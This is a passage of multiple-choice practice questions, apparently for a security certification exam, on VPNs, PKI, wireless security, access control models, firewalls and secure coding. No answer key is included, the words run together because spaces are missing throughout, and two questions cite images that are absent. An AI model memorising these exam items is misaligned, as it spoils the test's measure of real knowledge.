66. Patrickwantstodeployavirtualprivatenetworking(VPN)technologythatisaseasyforenduserstouseaspossible.WhattypeofVPNshouldhedeploy?

A. AnIPSecVPN

B. AnSSL/TLSVPN

C. AnHTML5L2TPVPN

D. AnSAMLVPN

67. Oliviaisresponsibleforwebapplicationsecurityforhercompany'se-


commerceserver.SheisparticularlyconcernedaboutXSSandSQLinjection.Whichtechniquewouldbemosteffectiveinmitigatingtheseattacks?

A. Propererrorhandling

B. Theuseofstoredprocedures

C. Properinputvalidation

D. Codesigning

68. Isaacwantstopreventcorporatemobiledevicesfrombeingusedoutsideofhiscompany'sbuildingsandcorporatecampus.Whatmobiledevicemanagement(MDM)capabilityshouldheusetoallowthis?

A. Patchmanagement

B. IPfiltering

C. Geofencing

D. Networkrestrictions

69. Sophiawantstotesthercompany'swebapplicationtoseeifitishandlinginputvalidationanddatavalidationproperly.Whichtestingmethodwouldbemosteffectiveforthis?

A. Staticcodeanalysis

B. Fuzzing

C. Baselining

D. Versioncontrol

70. AlainahasimplementedanHSM.WhichofthefollowingcapabilitiesisnotatypicalHSMfeature?

A. Encryptionanddecryptionfordigitalsignatures

B. Bootattestation

C. Securemanagementofdigitalkeys

D. Strongauthenticationsupport

71. Cynthiawantstoissuecontactlesscardstoprovideaccesstothebuildingssheistaskedwithsecuring.Whichofthefollowingtechnologiesshouldshedeploy?


A. RFID

B. Wi-Fi

C. Magstripe

D. HOTP

72. Alainawantstopreventbulkgatheringofemailaddressesandotherdirectoryinformationfromherweb-exposedLDAPdirectory.Whichofthefollowingsolutionswouldnothelpwiththis?

A. Usingaback-offalgorithm

B. ImplementingLDAPS

C. Requiringauthentication

D. Ratelimitingqueries

73. AlainahasbeentoldthatherorganizationusesaSANcertificateintheirenvironment.WhatdoesthistellAlainaaboutthecertificateinuseinherorganization?

A. Itisusedforastorageareanetwork.

B. ItisprovidedbySANS,anetworksecurityorganization.

C. Thecertificateispartofaself-signed,self-assignednamespace.

D. Thecertificateallowsmultiplehostnamestobeprotectedbythesamecertificate.

74. Edwardisresponsibleforwebapplicationsecurityatalargeinsurancecompany.Oneoftheapplicationsthatheisparticularlyconcernedaboutisusedbyinsuranceadjustersinthefield.Hewantstohavestrongauthenticationmethodstomitigatemisuseoftheapplication.Whatwouldbehisbestchoice?

A. Authenticatetheclientwithadigitalcertificate.

B. Implementaverystrongpasswordpolicy.

C. SecureapplicationcommunicationwithTransportLayerSecurity(TLS).

D. Implementawebapplicationfirewall(WAF).

75. SarahistheCIOforasmallcompany.Thecompanyusesseveralcustom


applicationsthathavecomplicatedinteractionswiththehostoperatingsystem.Sheisconcernedaboutensuringthatsystemsonhernetworkareallproperlypatched.Whatisthebestapproachinherenvironment?

A. Implementautomaticpatching.

B. Implementapolicythathasindividualuserspatchtheirsystems.

C. Delegatepatchmanagementtomanagersofdepartmentssothattheycanfindthebestpatchmanagementfortheirdepartments.

D. Immediatelydeploypatchestoatestenvironment;thenassoonastestingiscomplete,haveastagedrollouttotheproductionnetwork.

76. Garyusesawirelessanalyzertoperformasitesurveyofhisorganization.Whichofthefollowingisnotacommonfeatureofawirelessanalyzer'sabilitytoprovideinformationaboutthewirelessnetworksaroundit?

A. Theabilitytoshowsignalstrengthofaccesspointsonamapofthefacility

B. TheabilitytoshowtheversionoftheRADIUSserverusedforauthentication

C. TheabilitytoshowalistofSSIDsavailableinagivenlocation

D. Theabilitytoshowtheversionofthe802.11protocol(n,ac,ax)

77. Emilianoisanetworkadministratorandisconcernedaboutthesecurityofperipheraldevices.Whichofthefollowingwouldbeabasicstephecouldtaketoimprovesecurityforthosedevices?

A. ImplementFDE.

B. Turnoffremoteaccess(SSH,Telnet,etc.)ifnotneeded.

C. Utilizefuzztestingforallperipherals.

D. Implementdigitalcertificatesforallperipherals.

78. Whattypeofcodeanalysisismanualcodereview?

A. Dynamiccodereview

B. Fagancodereview

C. Staticcodereview

D. Fuzzing


79. Samanthahasusedssh-keygentogeneratenewSSHkeys.WhichSSHkeyshouldsheplaceontheservershewantstoaccess,andwhereisittypicallystoredonaLinuxsystem?

A. HerpublicSSHkey,/etc/

B. HerprivateSSHkey,/etc/

C. HerpublicSSHkey,~/.ssh

D. HerprivateSSHkey,~/.ssh

80. Ixxiaisasoftwaredevelopmentteammanager.Sheisconcernedaboutmemoryleaksincode.Whattypeoftestingismostlikelytofindmemoryleaks?

A. Fuzzing

B. Stresstesting

C. Staticcodeanalysis

D. Normalization

81. WhatIPaddressdoesaloadbalancerprovideforexternalconnectionstoconnecttowebserversinaload-balancedgroup?

A. TheIPaddressforeachserver,inaprioritizedorder

B. Theloadbalancer'sIPaddress

C. TheIPaddressforeachserverinaround-robinorder

D. AvirtualIPaddress

82. Whattermdescribesrandombitsthatareaddedtoapasswordbeforeitishashedandstoredinadatabase?

A. Flavoring

B. Rainbow-armor

C. Bit-rot

D. Salt

83. Victorisanetworkadministratorforamedium-sizedcompany.Hewantstobeabletoaccessserversremotelysothathecanperformsmalladministrativetasksfromremotelocations.Whichofthefollowingwouldbethebestprotocolforhimtouse?


A. SSH

B. Telnet

C. RSH

D. SNMP

84. Danconfiguresaresource-basedpolicyinhisAmazonaccount.Whatcontrolhashedeployed?

A. Acontrolthatdetermineswhohasaccesstotheresource,andtheactionstheycantakeonit

B. Acontrolthatdeterminestheamountthatservicecancostbeforeanalarmissent

C. Acontrolthatdeterminestheamountofafiniteresourcethatcanbeconsumedbeforeanalarmisset

D. Acontrolthatdetermineswhatanidentitycando

85. Charlene'scompanyusesrack-mountedsensorappliancesintheirdatacenter.Whataresensorslikethesetypicallymonitoring?

A. Temperatureandhumidity

B. Smokeandfire

C. Powerqualityandreliability

D. Noneoftheabove

86. LaurelisreviewingtheconfigurationforanemailserverinherorganizationanddiscoversthatthereisaservicerunningonTCPport993.Whatsecureemailservicehasshemostlikelydiscovered?

A. SecurePOP3

B. SecureSMTP

C. SecureIMAP(IMAPS)

D. SecureMIME(SMIME)

87. Whattypeoftopologydoesanadhocwirelessnetworkuse?

A. Point-to-multipoint

B. Star


C. Point-to-point

D. Bus

88. Whatistheprimaryadvantageofallowingonlysignedcodetobeinstalledoncomputers?

A. Itguaranteesthatmalwarewillnotbeinstalled.

B. Itimprovespatchmanagement.

C. Itverifieswhocreatedthesoftware.

D. ItexecutesfasteroncomputerswithaTrustedPlatformModule(TPM).

89. Samanthahasbeenaskedtoprovidearecommendationforherorganizationaboutpasswordsecuritypractices.Usershavecomplainedthattheyhavetoremembertoomanypasswordsaspartoftheirjobandthattheyneedawaytokeeptrackofthem.WhatshouldSamantharecommend?

A. Recommendthatuserswritepasswordsdownneartheirworkstation.

B. Recommendthatusersusethesamepasswordforsiteswithsimilardataorriskprofiles.

C. Recommendthatuserschangetheirstandardpasswordsslightlybasedonthesitetheyareusing.

D. Recommendapasswordvaultormanagerapplication.

90. Matthasenabledportsecurityonthenetworkswitchesinhisbuilding.Whatdoesportsecuritydo?

A. FiltersbyMACaddress

B. Preventsroutingprotocolupdatesfrombeingsentfromprotectedports

C. EstablishesprivateVLANs

D. PreventsduplicateMACaddressesfromconnectingtothenetwork

91. TomisresponsibleforVPNconnectionsinhiscompany.HiscompanyusesIPSecforVPNs.WhatistheprimarypurposeofAHinIPSec?

A. Encrypttheentirepacket.

B. Encryptjusttheheader.

C. Authenticatetheentirepacket.


D. Authenticatejusttheheader.

92. MileswantstoensurethathisinternalDNScannotbequeriedbyoutsideusers.WhatDNSdesignpatternusesdifferentinternalandexternalDNSserverstoprovidepotentiallydifferentDNSresponsestousersofthosenetworks?

A. DNSSEC

B. SplithorizonDNS

C. DMZDNS

D. DNSproxying

93. Abigailisresponsibleforsettingupanetwork-basedintrusionpreventionsystem(NIPS)onhernetwork.TheNIPSislocatedinoneparticularnetworksegment.SheislookingforapassivemethodtogetacopyofalltraffictotheNIPSnetworksegmentsothatitcananalyzethetraffic.Whichofthefollowingwouldbeherbestchoice?

A. Usinganetworktap

B. Usingportmirroring

C. SettingtheNIPSonaVLANthatisconnectedtoallothersegments

D. SettingupaNIPSoneachsegment

94. Amandawantstoallowusersfromotherorganizationstologintoherwirelessnetwork.Whattechnologywouldallowhertodothisusingtheirownhomeorganization'scredentials?

A. Presharedkeys

B. 802.11q

C. RADIUSfederation

D. OpenIDConnect

95. Nathanwantstoensurethatthemobiledeviceshisorganizationhasdeployedcanonlybeusedinthecompany'sfacilities.Whattypeofauthenticationshouldhedeploytoensurethis?

A. PINs

B. Biometrics


C. Context-awareauthentication

D. Content-awareauthentication

96. WhichofthefollowingbestdescribesaTPM?

A. TransportProtectionMode

B. Asecurecryptoprocessor

C. ADNSSECextension

D. TotalPatchManagement

97. JaniceisexplaininghowIPSecworkstoanewnetworkadministrator.SheistryingtoexplaintheroleofIKE.WhichofthefollowingmostcloselymatchestheroleofIKEinIPSec?

A. Itencryptsthepacket.

B. ItestablishestheSAs.

C. Itauthenticatesthepacket.

D. Itestablishesthetunnel.

98. Whatcertificateismostlikelytobeusedbyanofflinecertificateauthority(CA)?

A. Root

B. Machine/computer

C. User

D. Email

99. EmilymanagestheIDS/IPSforhernetwork.Shehasanetwork-basedintrusionpreventionsystem(NIPS)installedandproperlyconfigured.Itisnotdetectingobviousattacksononespecificnetworksegment.ShehasverifiedthattheNIPSisproperlyconfiguredandworkingproperly.Whatwouldbethemostefficientwayforhertoaddressthis?

A. Implementportmirroringforthatsegment.

B. InstallaNIPSonthatsegment.

C. UpgradetoamoreeffectiveNIPS.

D. IsolatethatsegmentonitsownVLAN.


100. Danawantstoprotectdatainadatabasewithoutchangingcharacteristicslikethedatalengthandtype.Whattechniquecansheusetodothismosteffectively?

A. Hashing

B. Tokenization

C. Encryption

D. Rotation

101. Elenoraisresponsibleforlogcollectionandanalysisforacompanywithlocationsaroundthecountry.Shehasdiscoveredthatremotesitesgeneratehighvolumesoflogdata,whichcancausebandwidthconsumptionissuesforthosesites.Whattypeoftechnologycouldshedeploytoeachsitetohelpwiththis?

A. Deployalogaggregator.

B. Deployahoneypot.

C. Deployabastionhost.

D. Noneoftheabove

102. Daniisperformingadynamiccodeanalysistechniquethatsendsabroadrangeofdataasinputstotheapplicationsheistesting.Theinputsincludedatathatisbothwithintheexpectedrangesandtypesfortheprogramanddatathatisdifferentand,thus,unexpectedbytheprogram.WhatcodetestingtechniqueisDaniusing?

A. Timeboxing

B. Bufferoverflow

C. Inputvalidation

D. Fuzzing

103. TinawantstoensurethatrogueDHCPserversarenotpermittedonthenetworkshemaintains.Whatcanshedotoprotectagainstthis?

A. DeployanIDStostoprogueDHCPpackets.

B. EnableDHCPsnooping.

C. DisableDHCPsnooping.


D. BlocktrafficontheDHCPportstoallsystems.

104. Endpointdetectionandresponsehasthreemajorcomponentsthatmakeupitsabilitytoprovidevisibilityintoendpoints.Whichofthefollowingisnotoneofthosethreeparts?

A. Datasearch

B. Malwareanalysis

C. Dataexploration

D. Suspiciousactivitydetection

105. Isabelleisresponsibleforsecurityatamid-sizedcompany.Shewantstopreventusersonhernetworkfromvisitingjob-huntingsiteswhileatwork.Whichofthefollowingwouldbethebestdevicetoaccomplishthisgoal?

A. Proxyserver

B. NAT

C. Apacketfilterfirewall

D. NIPS

106. Whattermdescribesacloudsystemthatstores,manages,andallowsauditingofAPIkeys,passwords,andcertificates?

A. AcloudPKI

B. AcloudTPM

C. Asecretsmanager

D. Ahushservice

107. Fredisbuildingawebapplicationthatwillreceiveinformationfromaserviceprovider.Whatopenstandardshouldhedesignhisapplicationtousetoworkwithmanymodernthird-partyidentityproviders?

A. SAML

B. Kerberos

C. LDAP

D. NTLM

108. Youareresponsibleforane-commercesite.Thesiteishostedinacluster.Whichofthefollowingtechniqueswouldbebestinassuringavailability?


A. AVPNconcentrator

B. Aggregateswitching

C. AnSSLaccelerator

D. Loadbalancing

109. WhatchannelsdonotcauseissueswithchanneloverlaporoverlapinU.S.installationsof2.4GHzWi-Finetworks?

A. 1,3,5,7,9,and11

B. 2,6,and10

C. 1,6,and11

D. Wi-Fichannelsdonotsufferfromchanneloverlap.

110. Ryanisconcernedaboutthesecurityofhiscompany'swebapplication.Sincetheapplicationprocessesconfidentialdata,heismostconcernedaboutdataexposure.Whichofthefollowingwouldbethemostimportantforhimtoimplement?

A. WAF

B. TLS

C. NIPS

D. NIDS

111. Whichofthefollowingconnectionmethodsonlyworksviaaline-of-sightconnection?

A. Bluetooth

B. Infrared

C. NFC

D. Wi-Fi

112. Caroleisresponsibleforvariousnetworkprotocolsathercompany.TheNetworkTimeProtocolhasbeenintermittentlyfailing.Whichofthefollowingwouldbemostaffected?

A. Kerberos

B. RADIUS


C. CHAP

D. LDAP

113. Youareselectinganauthenticationmethodforyourcompany'sservers.Youarelookingforamethodthatperiodicallyreauthenticatesclientstopreventsessionhijacking.Whichofthefollowingwouldbeyourbestchoice?

A. PAP

B. SPAP

C. CHAP

D. OAuth

114. Naomiwantstodeployafirewallthatwillprotectherendpointsystemsfromothersystemsinthesamesecurityzoneofhernetworkaspartofazero-trustdesign.Whattypeoffirewallisbestsuitedtothistypeofdeployment?

A. Hardwarefirewalls

B. Softwarefirewalls

C. Virtualfirewalls

D. Cloudfirewalls

115. Lisaissettingupaccountsforhercompany.ShewantstosetupaccountsfortheOracledatabaseserver.Whichofthefollowingwouldbethebesttypeofaccounttoassigntothedatabaseservice?

A. User

B. Guest

C. Admin

D. Service

116. GarywantstoimplementEAP-basedprotocolsforhiswirelessauthenticationandwantstoensurethatheusesonlyversionsthatsupportTransportLayerSecurity(TLS).WhichofthefollowingEAP-basedprotocolsdoesnotsupportTLS?

A. LEAP

B. EAP-TTLS


C. PEAP

D. EAP-TLS

117. Mannywantstodownloadappsthataren'tintheiOSAppStore,aswellaschangesettingsattheOSlevelthatAppledoesnotnormallyallowtobechanged.WhatwouldheneedtodotohisiPhonetoallowthis?

A. Buyanappviaathird-partyappstore.

B. Installanappviaside-loading.

C. Jailbreakthephone.

D. InstallAndroidonthephone.

118. Manysmartcardsimplementawirelesstechnologytoallowthemtobeusedwithoutacardreader.Whatwirelesstechnologyisfrequentlyusedtoallowtheuseofsmartcardsforentry-accessreadersandsimilaraccesscontrols?

A. Infrared

B. Wi-Fi

C. RFID

D. Bluetooth

119. Carlhasbeenaskedtosetupaccesscontrolforaserver.Therequirementsstatethatusersatalowerprivilegelevelshouldnotbeabletoseeoraccessfilesordataatahigherprivilegelevel.Whataccesscontrolmodelwouldbestfittheserequirements?

A. MAC

B. DAC

C. RBAC

D. SAML

120. Jackwantstodeployanetworkaccesscontrol(NAC)systemthatwillstopsystemsthatarenotfullypatchedfromconnectingtohisnetwork.Ifhewantstohavefulldetailsofsystemconfiguration,antivirusversion,andpatchlevel,whattypeofNACdeploymentismostlikelytomeethisneeds?

A. Agentless,preadmission

B. Agent-based,preadmission


C. Agentless,postadmission

D. Agent-based,postadmission

121. Clairehasbeennotifiedofazero-dayflawinawebapplication.Shehastheexploitcode,includingaSQLinjectionattackthatisbeingactivelyexploited.Howcanshequicklyreacttopreventthisissuefromimpactingherenvironmentifsheneedstheapplicationtocontinuetofunction?

A. DeployadetectionruletoherIDS.

B. Manuallyupdatetheapplicationcodeafterreverse-engineeringit.

C. DeployafixviaherWAF.

D. Installthevendorprovidedpatch.

122. Ericwantstoprovidecompany-purchaseddevices,buthisorganizationpreferstoprovideenduserswithchoicesamongdevicesthatcanbemanagedandmaintainedcentrally.Whatmobiledevicedeploymentmodelbestfitsthisneed?

A. BYOD

B. COPE

C. CYOD

D. VDI

123. Derekisinchargeofhisorganization'scertificateauthoritiesandwantstoaddanewcertificateauthority.Hisorganizationalreadyhasthreecertificateauthoritiesoperatinginamesh:A.SouthAmericanCA,B.theUnitedStatesCA,andC,theEuropeanUnionCA.AstheyexpandintoAustralia,hewantstoaddD.theAustralianCA.WhichCAswillDerekneedtoissuecertificatestofromD.toensurethatsystemsintheAustraliandomainareabletoaccessserversinA,B,andC'sdomains?

A. HeneedsalltheothersystemstoissueDcertificatessothathissystemswillbetrustedthere.

B. HeneedstoissuecertificatesfromDtoeachoftheotherCAssystemsandthenhavetheotherCAsissueDacertificate.

C. HeneedstoprovidetheprivatekeyfromDtoeachoftheotherCAs.

D. HeneedstoreceivetheprivatekeyfromeachoftheotherCAsanduseittosigntherootcertificateforD.


124. Claireisconcernedaboutanattackergettinginformationregardingnetworkdevicesandtheirconfigurationinhercompany.Whichprotocolshouldsheimplementthatwouldbemosthelpfulinmitigatingthisriskwhileprovidingmanagementandreportingaboutnetworkdevices?

A. RADIUS

B. TLS

C. SNMPv3

D. SFTP

125. Benisusingatoolthatisspecificallydesignedtosendunexpecteddatatoawebapplicationthatheistesting.Theapplicationisrunninginatestenvironment,andconfiguredtologeventsandchanges.WhattypeoftoolisBenusing?

A. ASQLinjectionproxy

B. Astaticcodereviewtool

C. Awebproxy

D. Afuzzer

126. Ericisresponsibleforhisorganization'smobiledevicesecurity.Theyuseamodernmobiledevicemanagement(MDM)tooltomanageaBYODmobiledeviceenvironment.Ericneedstoensurethattheapplicationsanddatathathisorganizationprovidestousersofthosemobiledevicesremainassecureaspossible.Whichofthefollowingtechnologieswillprovidehimwiththebestsecurity?

A. Storagesegmentation

B. Containerization

C. Full-deviceencryption

D. Remotewipe

127. Muraliislookingforanauthenticationprotocolforhisnetwork.Heisveryconcernedabouthighlyskilledattackers.Aspartofmitigatingthatconcern,hewantsanauthenticationprotocolthatneveractuallytransmitsauser'spassword,inanyform.WhichauthenticationprotocolwouldbeagoodfitforMurali'sneeds?

A. CHAP


B. Kerberos

C. RBAC

D. TypeII

128. AspartofthecertificateissuanceprocessfromtheCAthathercompanyworkswith,Marieisrequiredtoprovethatsheisavalidrepresentativeofhercompany.TheCAgoesthroughadditionalstepstoensurethatsheiswhoshesayssheisandthathercompanyislegitimate,andnotallCAscanissuethistypeofcertificate.Whattypeofcertificatehasshebeenissued?

A. AnEVcertificate

B. Adomain-validatedcertificate

C. Anorganizationvalidationcertificate

D. AnOCSPcertificate

129. Markwantstoprovideawirelessconnectionwiththehighestpossibleamountofbandwidth.Whichofthefollowingshouldheselect?

A. LTEcellular

B. Bluetooth

C. NFC

D. 802.11acWi-Fi

130. Whatistheprimaryadvantageofcloud-nativesecuritysolutionswhencomparedtothird-partysolutionsdeployedtothesamecloudenvironment?

A. Lowercost

B. Bettersecurity

C. Tighterintegration

D. Alloftheabove

131. EdneedstosecurelyconnecttoaDMZfromanadministrativenetworkusingSecureShell(SSH).Whattypeofsystemisfrequentlydeployedtoallowthistobedonesecurelyacrosssecurityboundariesfornetworksegmentswithdifferentsecuritylevels?

A. AnIPS

B. ANATgateway


C. Arouter

D. Ajumpbox

132. Youworkforasocialmediawebsite.Youwishtointegrateyourusers’accountswithotherwebresources.Todoso,youneedtoallowauthenticationtobeusedacrossdifferentdomains,withoutexposingyourusers’passwordstotheseotherservices.Whichofthefollowingwouldbemosthelpfulinaccomplishingthisgoal?

A. Kerberos

B. SAML

C. OAuth

D. OpenID

133. Christinawantstoensurethatsessionpersistenceismaintainedbyherloadbalancer.Whatissheattemptingtodo?

A. Ensurethatallofaclient'srequestsgotothesameserverforthedurationofagivensessionortransaction.

B. AssignthesameinternalIPaddresstoclientswhenevertheyconnectthroughtheloadbalancer.

C. Ensurethatalltransactionsgotothecurrentserverinaround-robinduringthetimeitistheprimaryserver.

D. AssignthesameexternalIPaddresstoallserverswhenevertheyaretheprimaryserverassignedbytheloadbalancer.

134. TaraisconcernedaboutstaffinherorganizationsendingemailwithsensitiveinformationlikecustomerSocialSecuritynumbers(SSNs)includedinit.Whattypeofsolutioncansheimplementtohelppreventinadvertentexposuresofthistypeofsensitivedata?

A. FDE

B. DLP

C. S/MIME

D. POP3S

135. Jenniferisconsideringusinganinfrastructureasaservicecloudprovidertohostherorganization'swebapplication,database,andwebservers.Which


ofthefollowingisnotareasonthatshewouldchoosetodeploytoacloudservice?

A. Supportforhighavailability

B. Directcontrolofunderlyinghardware

C. Reliabilityofunderlyingstorage

D. Replicationtomultiplegeographiczones

136. Thisimageshowsanexampleofatypeofsecuremanagementinterface.Whattermdescribesusingmanagementinterfacesorprotectedalternatemeanstomanagedevicesandsystems?

A. ADMZ

B. Out-of-bandmanagement

C. In-bandmanagement

D. ATLS


137. ChrishasprovidedtheBitLockerencryptionkeysforcomputersinhisdepartmenttohisorganization'ssecurityofficesothattheycandecryptcomputersintheeventofabreachofinvestigation.Whatisthisconceptcalled?

A. Keyescrow

B. ABitLockerLocker

C. Keysubmission

D. AESjail

138. Marekhasconfiguredsystemsinhisnetworktoperformbootattestation.Whathasheconfiguredthesystemstodo?

A. Torunonlytrustedsoftwarebasedonpreviouslystoredhashesusingachainedbootprocess

B. TonotifyaBOOTPserverwhenthesystemhasbootedup

C. TohashtheBIOSofthesystemtoensurethatthebootprocesshasoccurredsecurely

D. Tonotifyaremotesystemormanagementtoolthatthebootprocesswassecureusingmeasurementsfromthebootprocess

139. Youhavebeenaskedtofindanauthenticationservicethatishandledbyathirdparty.Theserviceshouldallowuserstoaccessmultiplewebsites,aslongastheysupportthethird-partyauthenticationservice.Whatwouldbeyourbestchoice?

A. OpenID

B. Kerberos

C. NTLM

D. Shibboleth

140. WhichofthefollowingstepsisacommonwaytohardentheWindowsregistry?

A. Ensuretheregistryisfullypatched.

B. Settheregistrytoread-onlymode.

C. Disableremoteregistryaccessifnotrequired.


D. Encryptalluser-moderegistrykeys.

141. Loisisdesigningthephysicallayoutforherwirelessaccesspoint(WAP)placementinherorganization.WhichofthefollowingitemsisnotacommonconcernwhendesigningaWAPlayout?

A. Determiningconstructionmaterialofthewallsaroundtheaccesspoints

B. Assessingpowerlevelsfromotheraccesspoints

C. Performingasitesurvey

D. Maximizingcoverageoverlap

142. Gabbyhasbeenlaidofffromtheorganizationthatshehasworkedatforalmostadecade.MarkneedstomakesurethatGabby'saccountissecurelyhandledafterherlastdayofwork.WhatcanhedotoheraccountasaninterimsteptobestensurethatfilesarestillaccessibleandthattheaccountcouldbereturnedtouseifGabbyreturnsafterthelayoff?

A. Deletetheaccountandre-createitwhenitisneeded.

B. Disabletheaccountandreenableitifitisneeded.

C. LeavetheaccountactiveincaseGabbyreturns.

D. ChangethepasswordtooneGabbydoesnotknow.

143. Masonisresponsibleforsecurityatacompanythathastravelingsalespeople.ThecompanyhasbeenusingABACforaccesscontroltothenetwork.WhichofthefollowingisanissuethatisspecifictoABACandmightcauseittoincorrectlyrejectlogins?

A. Geographiclocation

B. Wrongpassword

C. RemoteaccessisnotallowedbyABAC.

D. FirewallsusuallyblockABAC.

144. Darrellisconcernedthatusersonhisnetworkhavetoomanypasswordstorememberandmightwritedowntheirpasswords,thuscreatingasignificantsecurityrisk.Whichofthefollowingwouldbemosthelpfulinmitigatingthisissue?

A. Multifactorauthentication


B. SSO

C. SAML

D. LDAP

145. Frankisasecurityadministratorforalargecompany.Occasionally,auserneedstoaccessaspecificresourcethattheydon'thavepermissiontoaccess.Whichaccesscontrolmethodologywouldbemosthelpfulinthissituation?

A. Mandatoryaccesscontrol(MAC)

B. Discretionaryaccesscontrol(DAC)

C. Role-basedaccesscontrol

D. Rule-basedaccesscontrol

146. Edisdesigningthesecurityarchitectureforhisorganization'smoveintoaninfrastructureasaservicecloudenvironment.Inhison-sitedatacenter,hehasdeployedafirewallinfrontofthedatacenternetworktoprotectit,andhehasbuiltrulesthatallownecessaryservicesin,aswellasoutboundtrafficforupdatesandsimilarneeds.Heknowsthathiscloudenvironmentwillbedifferent.Whichofthefollowingisnotatypicalconcernforcloudfirewalldesigns?

A. Segmentationrequirementsforvirtualprivateclouds(VPCs)

B. Hardwareaccessforupdates

C. Thecostofoperatingfirewallservicesinthecloud

D. OSIlayersandvisibilityoftraffictocloudfirewalls

147. Ameliaislookingforanetworkauthenticationmethodthatcanusedigitalcertificatesanddoesnotrequireenduserstorememberpasswords.Whichofthefollowingwouldbestfitherrequirements?

A. OAuth

B. Tokens

C. OpenID

D. RBAC

148. Damianhasdesignedandbuiltawebsitethatisaccessibleonlyinsideofacorporatenetwork.Whattermisusedtodescribethistypeofinternal


resource?

A. Anintranet

B. Anextranet

C. ADMZ

D. ATTL

149. ThefirewallthatWalterhasdeployedlooksateverypacketsentbysystemsthattravelthroughit,ensuringthateachpacketmatchestherulesthatitoperatesandfilterstrafficby.Whattypeoffirewallisbeingdescribed?

A. Nextgeneration

B. Stateless

C. Applicationlayer

D. Stateful

150. NancywantstoprotectandmanageherRSAkeyswhileusingamobiledevice.Whattypeofsolutioncouldshepurchasetoensurethatthekeysaresecuresothatshecanperformpublickeyauthentication?

A. Anapplication-basedPKI

B. AnOPAL-encrypteddrive

C. AMicroSDHSM

D. AnofflineCA

151. OliverneedstoexplaintheaccesscontrolschemeusedbyboththeWindowsandLinuxfilesystems.Whataccesscontrolschemedotheyimplementbydefault?

A. Role-basedaccesscontrol

B. Mandatoryaccesscontrol

C. Rule-basedaccesscontrol

D. Discretionaryaccesscontrol

152. Stefanjustbecamethenewsecurityofficerforauniversity.Heisconcernedthatstudentworkerswhoworklateoncampuscouldtrytologinwithfacultycredentials.Whichofthefollowingwouldbemosteffectiveinpreventingthis?


A. Time-of-dayrestrictions

B. Usageauditing

C. Passwordlength

D. Credentialmanagement

153. Next-generationfirewallsincludemanycutting-edgefeatures.Whichofthefollowingisnotacommonnext-generationfirewallcapability?

A. Geolocation

B. IPSand/orIDS

C. Sandboxing

D. SQLinjection

154. Gregknowsthatwhenaswitchdoesn'tknowwhereanodeis,itwillsendoutabroadcasttoattempttofindit.Ifotherswitchesinsideitsbroadcastdomaindonotknowaboutthenode,theywillalsobroadcastthatquery,andthiscancreateamassiveamountoftrafficthatcanquicklyamplifyoutofcontrol.Hewantstopreventthisscenariowithoutcausingthenetworktobeunabletofunction.Whatport-levelsecurityfeaturecanheenabletopreventthis?

A. UseARPblocking.

B. Blockallbroadcastpackets.

C. Enablestormcontrol.

D. Noneoftheabove

155. Isaacisdesigninghisclouddatacenter'spublic-facingnetworkandwantstoproperlyimplementsegmentationtoprotecthisapplicationserverswhileallowinghiswebserverstobeaccessedbycustomers.Whatdesignconceptshouldheapplytoimplementthistypeofsecureenvironment?

A. Areverseproxyserver

B. ADMZ

C. Aforwardproxyserver

D. AVPC

156. Jenniferisconcernedthatsomepeopleinhercompanyhavemore


privilegesthantheyshould.Thishasoccurredduetopeoplemovingfromonepositiontoanotherandhavingcumulativerightsthatexceedtherequirementsoftheircurrentjobs.Whichofthefollowingwouldbemosteffectiveinmitigatingthisissue?

A. Permissionauditing

B. Jobrotation

C. Preventingjobrotation

D. Separationofduties

157. Susanhasbeentaskedwithhardeningthesystemsinherenvironmentandwantstoensurethatdatacannotberecoveredfromsystemsiftheyarestolenortheirdiskdrivesarestolenandaccessed.Whatisherbestoptiontoensuredatasecurityinthesesituations?

A. Deployfolder-levelencryption.

B. Deployfull-diskencryption.

C. Deployfile-levelencryption.

D. Degaussallthedrives.

158. Chloehasnoticedthatusersonhercompany'snetworkfrequentlyhavesimplepasswordsmadeupofcommonwords.Thus,theyhaveweakpasswords.HowcouldChloebestmitigatethisissue?

A. Increaseminimumpasswordlength.

B. Haveuserschangepasswordsmorefrequently.

C. Requirepasswordcomplexity.

D. ImplementSingleSign-On(SSO).

159. WhichWi-Fiprotocolimplementssimultaneousauthenticationofequals(SAE)toimproveonprevioussecuritymodels?

A. WEP

B. WPA

C. WPA2

D. WPA3

160. Meganwantstosetupanaccountthatcanbeissuedtovisitors.She


configuresakioskapplicationthatwillallowusersinherorganizationtosponsorthevisitor,settheamountoftimethattheuserwillbeon-site,andthenallowthemtologintotheaccount,setapassword,anduseWi-Fiandotherservices.WhattypeofaccounthasMegancreated?

A. Auseraccount

B. Asharedaccount

C. Aguestaccount

D. Aserviceaccount

161. Henrywantstodeployawebservicetohiscloudenvironmentforhiscustomerstouse.Hewantstobeabletoseewhatishappeningandstopabusewithoutshuttingdowntheserviceifcustomerscauseissues.Whattwothingsshouldheimplementtoallowthis?

A. AnAPIgatewayandlogging

B. APIkeysandloggingviaanAPIgateway

C. AnAPI-centricIPSandanAPIproxy

D. Alloftheabove

162. PatrickhasbeenaskedtoidentifyaUTMapplianceforhisorganization.WhichofthefollowingcapabilitiesisnotacommonfeatureforaUTMdevice?

A. IDSandorIPS

B. Antivirus

C. MDM

D. DLP

163. Acompanywidepolicyisbeingcreatedtodefinevarioussecuritylevels.WhichofthefollowingsystemsofaccesscontrolwouldusedocumentedsecuritylevelslikeConfidentialorSecretforinformation?

A. RBAC

B. MAC

C. DAC

D. BAC


164. Thisimageshowsatypeofproxy.Whattypeofproxyisshown?

A. Aforwardproxy

B. Aboomerangproxy

C. Anextgenerationproxy

D. Areverseproxy

165. Gurvinderisreviewinglogfilesforauthenticationeventsandnoticesthatoneofhisusershasloggedinfromasystemathiscompany'shomeofficeinChicago.Lessthananhourlater,thesameuserisrecordedaslogginginfromanIPaddressthatgeo-IPtoolssaycomesfromAustralia.Whattypeofissueshouldheflagthisas?

A. AmisconfiguredIPaddress

B. Animpossibletraveltime,riskyloginissue

C. Ageo-IPlookupissue

D. Noneoftheabove

166. Usersinyournetworkareabletoassignpermissionstotheirownsharedresources.Whichofthefollowingaccesscontrolmodelsisusedinyournetwork?

A. DAC

B. RBAC

C. MAC

D. ABAC

167. Cynthiaispreparinganewserverfordeploymentandherprocessincludesturningoffunnecessaryservices,settingsecuritysettingstomatchherorganization'sbaselineconfigurations,andinstallingpatchesandupdates.Whatisthisprocessknownas?

A. OShardening

B. Securityuplift


C. Configurationmanagement

D. Endpointlockdown

168. Johnisperformingaportscanofanetworkaspartofasecurityaudit.HenoticesthatthedomaincontrollerisusingsecureLDAP.Whichofthefollowingportswouldleadhimtothatconclusion?

A. 53

B. 389

C. 443

D. 636

